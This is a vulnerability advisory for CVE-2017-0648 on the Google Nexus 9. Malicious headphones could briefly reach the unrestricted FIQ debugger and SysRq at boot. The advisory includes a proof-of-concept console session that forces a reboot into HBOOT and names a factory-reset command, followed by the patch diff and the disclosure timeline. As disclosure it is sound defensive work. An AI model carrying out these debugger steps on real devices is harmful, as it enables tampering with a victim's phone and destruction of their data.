<--

Google Nexus 9 Ephemeral Access to Unrestricted FIQ Debugger and SysRq

Aleph Research Advisory

Identifier

CVE-2017-0648

Severity

High

Product

Google Nexus 9

Vulnerable Version

Google Nexus 9 before build N9F27C

Mitigation

Upgrade to N9F27C, released as part of the June 2017 Security Bulletin

Technical Details

Due to insufficient patching of CVE-2017-0510, malicious headphones could gain ephemeral access to the unrestricted FIQ Debugger and also issue SysRq commands. Such access, not blocked by CVE-2017-0510’s patch, was possible for a very short window of time during boot. Since the attacker could force a reboot even from the limited FIQ, he could access the capable FIQ even if the victim inserted the malicious cable after the platform had been fully loaded. Having ephemeral access to the unrestricted FIQ debugger is enough for the attacker to reboot into HBOOT (which can enable additional attacks), conduct factory resets, and more.

Ephemeral Access to Unrestricted FIQ and SysRq (CVE-2017-0648) 
=============================================================

      .------.   (1)    .------------------.
 .--> | BOOT | -------> | Unrestricted FIQ | --. 
 |    `------'          `---------.--------'   | (4) .-------.
 |                                |            |---> | HBOOT |
 |   (3)    .-------------.   (2) |            |     `-------'
 `--------- | Limited FIQ | <-----'            |            
            `-------------'                    | (5) .---------------.
                                               `---> | Factory Reset |
                                                     `---------------'
Transitions:   
(1) sysrq_enabled = SYSRQ_DEFAULT_ENABLE = 1
(2) init: write 0 /proc/sys/kernel/sysrq 0 => sysrq_enabled = 0
(3) attacker @ limited FIQ:      'reboot'
(4) attacker @ unrestricted FIQ: 'reboot oem-42'
(5) attacker @ unrestricted FIQ: 'reboot oem-76'

It should be noted that non-ephemeral unrestricted FIQ and SysRq access was also possible while the device was in the recovery mode, however, it is less interesting due to reduced likelihood of victims having malicious headphones connected while their device is in recovery mode.

Proof-of-Concept

The following demonstrates how we preempt an arbitrary process, and also get into the HBOOT mode, bypassing CVE-2017-0510’s patch. We assume the attack begins when the platform is fully-loaded. We force a (normal reboot), and then get an early and ephemeral access to the FIQ debugger, during which we issue the capable-FIQ bt command, and then reboot into HBOOT by issuing reboot oem-42:

debug> help
FIQ Debugger commands:
 reboot        Reboot
 reset         Hard reset
 irqs          Interrupt status
 sleep         Allow sleep while in FIQ
 nosleep       Disable sleep while in FIQ
 console       Switch terminal to console
 ps            Process list
debug> bt
debug> reboot
debug>
[0000.045] Battery Present
[0000.069] Battery Voltage: 3743 mV
[0000.072] Battery charge sufficient
[0000.076] Override BCT configs
[0000.078] NvBootEmcReadMrr+++
[...]
[hboot query] query 24 is not implemented
Platform Pre OS Boot configuration...
[INFO] booting linux @ 0x80080000, tags @ 0x83a80000, ramdisk @ 0x82a80000, machine type: -1
[...]
<hit enter to activate fiq debugger>
debug> help
FIQ Debugger commands:
    pc            PC status
    regs          Register dump
    allregs       Extended Register dump
    bt            Stack trace
    reboot [<c>]  Reboot with command <c>
    reset [<c>]   Hard reset with command <c>
    irqs          Interupt status
    kmsg          Kernel log
    version       Kernel version
    sleep         Allow sleep while in FIQ
    nosleep       Disable sleep while in FIQ
    console       Switch terminal to console
    cpu           Current CPU
    cpu <number>  Switch to CPU<number>
    ps            Process list
    sysrq         sysrq options
    sysrq <param> Execute sysrq with <param>
[...]
debug> bt
pid: 89  comm: kworker/u4:1
  x0 0000000000002ee0   x1 0000000000002d09
  x2 000000000859c84a   x3 ffffffc002968c00
  x4 0000000000defde8   x5 ffffffc000f56aa8
  x6 ffffffc0029c8400   x7 ffffffc0029c8800
  x8 ffffffc002935130   x9 0000000010624dd3
 x10 000000000001a1b6  x11 0000000000000066
 x12 000000000000006f  x13 0000000000000075
 x14 000000000000006e  x15 0000000000000064
 x16 000000000000000a  x17 0000000000000004
[...]
debug> reboot oem-42
[...]
###[ Bootloader Mode ]###
[...]
hboot> ?
#. <command>               : <brief description>
security_command:
  1. boot                    : no desc.
[...]
 14. readconfig              : no desc.
 15. readimei                : no desc.
 16. readmeid                : no desc.
 17. readpid                 : no desc.
 18. rebootRUU               : no desc.
 19. refurbish               : no desc.
 20. reset                   : no desc.
[...]
hboot>

Patch

Google has patched the vulnerability by commit 34597d088801, available in the N9F27C June 2017 build. The value of SYSRQ_DEFAULT_ENABLE is now 0, preventing access to the unrestricted FIQ debugger and SysRq interface since the kernel begins its execution:

diff --git a/include/linux/sysrq.h b/include/linux/sysrq.h
index 5a0bd93..d393eeb 100644
--- a/include/linux/sysrq.h
+++ b/include/linux/sysrq.h
@@ -18,7 +18,7 @@
 #include <linux/types.h>
 
 /* Enable/disable SYSRQ support by default (0==no, 1==yes). */
-#define SYSRQ_DEFAULT_ENABLE	1
+#define SYSRQ_DEFAULT_ENABLE	0
 
 /* Possible values of bitmask for enabling sysrq functions */
 /* 0x0001 is reserved for enable everything *

Timeline

  • 13-Jun-17
    : Public disclosure.
  • 06-Jun-17
    : Deadline.
  • 05-Jun-17
    : Vendor advisory available.
  • 08-Mar-17
    : Reported.
  • 08-Mar-17
    : Added as ALEPH-2017014.

Posts

Credit

External References

  1. Google's Advisory (June 2017)
  2. Factory Images for Nexus and Pixel Devices